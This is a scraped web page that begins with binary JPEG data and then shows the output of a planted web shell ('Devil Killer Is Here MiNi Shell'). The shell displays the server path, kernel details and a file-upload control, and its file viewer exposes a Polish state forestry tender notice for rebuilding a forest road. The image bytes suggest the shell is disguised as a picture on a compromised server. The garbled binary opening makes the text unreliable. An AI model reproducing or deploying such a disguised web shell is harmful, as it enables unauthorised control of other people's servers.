JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240903/0048328601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi leśnej w leśnictwie Cynków – Strąkowska </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PGL LP Nadleśnictwo Świerklaniec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536238</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Oświęcimska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świerklaniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-622</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 284 48 68</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">swierklaniec@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://swierklaniec.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi leśnej w leśnictwie Cynków – Strąkowska </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-584bafa0-8228-47ee-8211-d1399e7cd02e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00483286</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00048685/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa drogi leśnej w leśnictwie Cynków - Strąkowska nr inw. 220/703</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/tender/59204/summary <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com/pl/tender/59204/summary</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">szczegóły opisane w Regulaminie<br/>korzystania z platformy JOSEPHINE - zał.nr 8 do SWZ. Maksymalny rozmiar plików przesłanych za pośrednictwem platformy<br/>JOSEPHINE wynosi:<br/>-w przypadku wiadomości niezaszyfrowanej - całkowita maksymalna objętość wynosi 500MB<br/>-w przypadku wiadomości zaszyfrowanej - całkowita maksymalna objętość wynosi 300MB<br/>Maksymalna wielkość oznacza całkowita objętość danych Wykonawcy w ramach prowadzonej operacji<br/>Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie JOSEPHINE. Za datę przekazania wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ich złożenia na platformie JOSEPHINE.<br/>Zamawiający, określa niezbędne wymagania techniczne umożliwiające pracę na platformie JOSEPHINA tj.<br/>a) przeglądarka internetowa:<br/>- Microsoft Internet Explorer w wersji 11,0 i nowsze (http://microsoft.com/), - Google Chrome (http://google.com/chrome).<br/>- Mozilla Firefox w wersji 13,0 i nowsze (http://firefox.com)<br/>b) aktualna wersja oprogramowania Java. To oprogramowanie jest wymagane w celu poprawnego działania JOSEPHINE, jak<br/>również w momencie kiedy dane są podpisywane elektronicznym podpisem. Oprogramowanie Java można pobrać ze strony<br/>http://www.java.com/. To oprogramowanie jest dostępne bezpłatnie.<br/>Zamawiający, określa dopuszczalne formaty przesyłanych danych tj. plików<br/>o maksymalnej objętości danych wielkości do 500 MB (zalecany format: pdf.) Maksymalna wielkość oznacza całkowitą objętość<br/>danych wykonawcy w ramach prowadzonej operacji.<br/>Zamawiający dopuszcza formaty danych określone w rozporządzeniu Rady Ministrówz dnia 12 kwietnia 2012 r. w sprawie Krajowych<br/>Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017 r. poz. 2247) w szczególności formaty: .pdf,<br/>.doc, .docx, .rtf, .odt.<br/>Zamawiający, określa informacje na temat kodowania i oznaczania czasu odbioru danych. Odbiór danych przez Platformę stanowi<br/>data i godzina wysłania oferty przez Wykonawcę po kliknięciu w polecenie wyślij. Data i czas wysłania oferty przed upływem terminu<br/>składania ofert bądź po jego upłynięciu jest tym samym czasem, który pokaże się po stronie Zamawiającego i Wykonawcy. Data oraz<br/>dokładny czas (hh/mm/ss), znajduje się<br/>w wyświetlanym wierszu w profilu Wykonawcy i zapisuje się automatycznie do archiwum zamówienia po stronie Zamawiającego.<br/>Wykonawca musi posiadać ważny podpis elektroniczny oparty na kwalifikowanym certyfikacie spełniającym wymagania<br/>rozporządzenia (UE) nr 910/2014 Parlamentu Europejskiego i Rady Europy oraz odpowiednich przepisów państwowych, bądź<br/>podpis zaufany bądź podpis osobisty. Podpisy elektroniczne oparte na kwalifikowanym certyfikacie są wystawiane przez<br/>kwalifikowanych dostawców usług w poszczególnych państwach członkowskich UE.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, iż administratorem danych osobowych jest PGL LP Nadleśnictwo<br/>Świerklaniec. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w<br/>sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia.<br/>Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające<br/>upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności<br/>Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona na podstawie<br/>ustawy PZP.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 358 ust. 1 PZP, przez okres 4lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego.<br/>W przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu<br/>przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane<br/>podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe,<br/>Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych<br/>2) do sprostowana swoich danych osobowych<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym<br/>w przepisach PZP,<br/>Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związkuz prowadzeniem niniejszego postępowania o<br/>udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec<br/>przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.<br/>Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na<br/>podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.<br/>szczegóły w SWZ pkt. XXII</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">szczegóły w SWZ pkt. XXII</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 805986,35 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowią roboty budowlane tj. przebudowa drogi leśnej w leśnictwie<br/>Cynków 02-31-003 nr inw. 220/703, położonej na działkach ewidencyjnych nr 2710, 2709,<br/>2702, 2701 2695, 2692, 2684, 2729 obręb: Cynków (0001), gmina: Koziegłowy (2409025),<br/>powiat: Myszkowski. Długość drogi objętej przebudową wynosi 1800 mb. Przedmiotowa droga<br/>pełni funkcję drogi leśnej, gospodarczej oraz drogi pożarowej.<br/>Przedmiotowa droga zlokalizowana jest na terenie leśnictwa Cynków oddz. 123, 184/185,<br/>193/194, 252/253,307 będącego w zarządzie Nadleśnictwa Świerklaniec. Istniejąca<br/>nawierzchnia to nawierzchnia gruntowa ulepszana praktycznie na całej długości. Obecny stan<br/>techniczny drogi jest zły (rok budowy: 2004). Występują liczne deformacje w przekroju<br/>poprzecznym i w profilu podłużnym. Szlak wywozowy w sieci drogowej Nadleśnictwa jest<br/>szlakiem silnie uczęszczanym i podstawowym, a także stanowi drogę udostępnioną do ruchu<br/>dla społeczeństwa. Z uwagi na udostępnienie drogi Wykonawca zobowiązany jest do<br/>3<br/>prawidłowego oznakowania miejsca prowadzonych robót i zabezpieczenia wjazdu na teren<br/>robót w sposób widoczny w każdych warunkach atmosferycznych i o każdej porze dnia<br/>(szczególnie w nocy).<br/>Przebieg geometryczny drogi pozostawiono bez zmian, tzn. dostosowano go do aktualnego<br/>przebiegu za wyjątkiem utwardzenia brodu. Całkowita długość szlaku przeznaczonego do<br/>przebudowy i utwardzenia wynosi L=1800 m.<br/>Projektuje się :<br/>- wykonanie nawierzchni jezdni szerokości 3,5 m z tłucznia kamiennego i zaklinowanie<br/>tłucznia klińcem oraz miałem kamiennym;<br/>- wykonanie obustronnych poboczy o szerokości 0,5 m z tłucznia kamiennego<br/>(31,5 – 63,0mm) o spadku 6%;<br/>- wykonanie rozjazdów dwustronnych o promieniach łuków R=6 m i R=12 m;<br/>- wykonanie 8 (ośmiu) mijanek o całkowitej długości 65 m każda (najazd 21 m, pas<br/>zasadniczy 23m, zjazd 21m), w tym mijanki przy rozjeździe;<br/>- wykonanie dwóch placów postojowych o wymiarach 15m x 5m każdy;<br/>- odtworzenie rowów na odcinku 21mb;<br/>- wykonanie dołu chłonnego 5m x 5m x 1,2m jedna skarpa łagodna;<br/>- wykonanie 1 (jednego ) sączka 50cm x 70cm x 500cm kruszywa 40-80mm.<br/>Zaplanowano następujące konstrukcje:<br/>Projektowane warstwy konstrukcyjne jezdni – jezdnia główna<br/>− warstwa górna gr. 5cm kruszywo kamienne frakcja 4-31,5mm zamulone miałem frakcji<br/>0,075-4mm<br/>− warstwa dolna gr. 15cm kruszywo kamienne frakcja 31,5-63,0 mm<br/>− wyplantowane koryto drogi<br/>− łącznie 20cm nawierzchni tłuczniowej<br/>Projektowane warstwy konstrukcyjne jezdni – jezdnia mijanki<br/>− warstwa górna gr. 5cm kruszywo kamienne frakcja 4-31,5mm zamulone miałem frakcji<br/>0,075-4mm<br/>− warstwa dolna gr. 35cm kruszywo kamienne frakcja 31,5-63,0 mm<br/>− wyplantowane koryto drogi<br/>− łącznie 40cm nawierzchni tłuczniowej<br/>Projektowana nawierzchnia poboczy drogi leśnej<br/>− Pobocza wykonane z tłucznia frakcja 31,5/63,0 mm<br/>Pochylenia poprzeczne jezdni jednostronne o nachyleniu i=3%, pochylenia poprzeczne<br/>pobocza i=4% w kierunku pobocza.<br/>4<br/>Szczegółowy zakres przedmiotu zamówienia oraz parametry określa dokumentacja projektowa<br/>oraz Specyfikacja techniczna wykonania i odbioru robót, przedmiar robót oraz ustalenia<br/>wynikające z wzoru umowy. Wykonawca obowiązany jest zapoznać się z SWZ i jej<br/>załącznikami i zrealizować zamówienie na zasadach i warunkach w nich opisanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233225-2 - Roboty budowlane w zakresie dróg jednopasmowych</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Cena ofertowa (C) – 60 %,<br/>2) Okres gwarancji (G) – 40 %, <br/>Najkorzystniejszą będzie oferta, której suma kryteriów przedstawi najwyższą ilość punktów<br/>tj. C + G = Oferta najkorzystniejsza<br/>Zamawiający przy wyliczaniu punktów za poszczególne kryteria ogranicza się do dwóch miejsc po przecinku. Jednocześnie w przypadku niewypełnienia lub błędnego wypełnienia kryterium dotyczącego „okresu gwarancji i rękojmi”, Zamawiający informuje, że przyzna 0 pkt w tym kryterium.<br/>Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp Zamawiający określa warunki udziału w postępowaniu:<br/>1) zdolność do występowania w obrocie gospodarczym: Brak szczególnych wymagań<br/>2) uprawnienie do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów: Brak szczególnych wymagań<br/>3) sytuacja ekonomiczna i finansowa:<br/>Zamawiający w celu spełnienia powyższego warunku wymaga, aby Wykonawca wykazał się:<br/>-posiadaniem środków na rachunku bankowym bądź zdolnością kredytową na kwotę<br/>400 000,00zł<br/>-posiadaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia w wysokości sumy gwarancyjne nie<br/>mniejszej niż 400 000,00 zł, a okres ubezpieczenia obejmować musi czas realizacji zamówienia<br/>przez Wykonawcę.<br/>Zamawiający będzie je oceniał:<br/>Spełnia/nie spełnia<br/>4) zdolności technicznej lub zawodowej:<br/>a) W zakresie posiadania wiedzy i doświadczenia:<br/>Zamawiający w celu spełnienia powyższego warunku wymaga, aby Wykonawca wykazał się:<br/>doświadczeniem polegającym na realizacji co najmniej jednej roboty budowlanej w okresie<br/>ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem przedmiotowi<br/>zamówienia, a polegającą na budowie lub przebudowie drogi o nawierzchni z kruszywa<br/>naturalnego łamanego, na kwotę nie mniejszą niż 700 000,00 zł netto, z podaniem ich wartości,<br/>12<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz<br/>załączy dokumenty potwierdzające, że roboty te zostały wykonane należycie.<br/>UWAGA<br/>1) Wykonawca nie może sumować wartości kilku robót o mniejszym zakresie dla uzyskania<br/>wymaganej wartości porównywalnej,<br/>2) Wykonawca może się powołać na doświadczenie zdobyte przy realizacji robót w ramach<br/>konsorcjum, tylko w takim zakresie, w jakim rzeczywiście roboty te sam wykonał<br/>3) W przypadku konsorcjum przynajmniej jedna z firm musi spełnić warunek wymieniony<br/>w pkt. 4 lit. a<br/>b.) Odnośnie zatrudnienia<br/>- dysponowaniem osobami posiadającymi odpowiednie wykształcenie i kwalifikacje do<br/>wykonania zamówienia w tym w szczególności:<br/>- Dysponowanie co najmniej jedną osobą, która będzie pełniła funkcję Kierownika Budowy,<br/>posiadającą uprawnienia budowlane do kierowania robotami budowlanymi lub w specjalności<br/>konstrukcyjno-budowlanej bez ograniczeń, wydane wg art. 12a ustawy z dnia 7 lipca 1994 r.<br/>Prawo Budowlane (t.j. Dz.U. 2024 poz. 725 z późn.zm.) - zwane dalej Prawem Budowlanym,<br/>który pełnił funkcję kierownika budowy przy budowie, przebudowie, modernizacji lub<br/>remoncie w specjalności drogowej Zamawiający uzna warunek posiadania uprawnień<br/>budowlanych poprzez przedstawienie osób posiadających uprawnienia budowlane w<br/>specjalnościach inaczej nazwanych, lecz wyłącznie takich, które uprawniają do wykonywania<br/>tych samych czynności, do których uprawniają uprawnienia budowlane bez ograniczeń do<br/>kierowania robotami budowlanymi w specjalności drogowej. Przez uprawnienia budowlane bez<br/>ograniczeń do kierowania robotami budowlanymi rozumie się uprawnienia do sprawowania<br/>samodzielnych funkcji technicznych w budownictwie, wydane na podstawie Prawa<br/>Budowlanego albo odpowiadające im inne ważne uprawnienia budowlane wydane na mocy<br/>wcześniej obowiązujących przepisów. 